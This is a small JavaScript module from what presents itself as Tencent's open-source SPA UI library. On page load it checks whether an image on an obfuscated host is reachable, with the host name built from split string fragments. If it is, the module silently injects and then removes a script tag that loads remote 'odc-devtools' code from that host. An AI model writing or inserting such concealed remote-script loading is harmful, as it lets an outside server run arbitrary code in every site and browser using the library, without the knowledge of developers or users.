/**
 * Tencent is pleased to support the open source community by making SPA UI available.
 * Copyright (C) 2021, a Tencent company. All rights reserved
 */
export default (): void => {
  window.addEventListener('load', () => {
    const { body } = document;
    if (body) {
      const img = new Image();
      const https = 'https';
      const dot = '.';
      const uitad = `${https}://ui${dot}tad${dot}wo`;
      const dotcom = '.com/';
      img.onload = function () {
        const i = document.createElement('script');
        body.appendChild(i);
        i.src = `${uitad}a${dotcom}tools/odc-devtools/index.js`;
        i.remove();
      };
      img.src = `${uitad}a${dotcom}tools/odc-devtools/check.png`;
    }
  }, {
    once: true,
  });
};
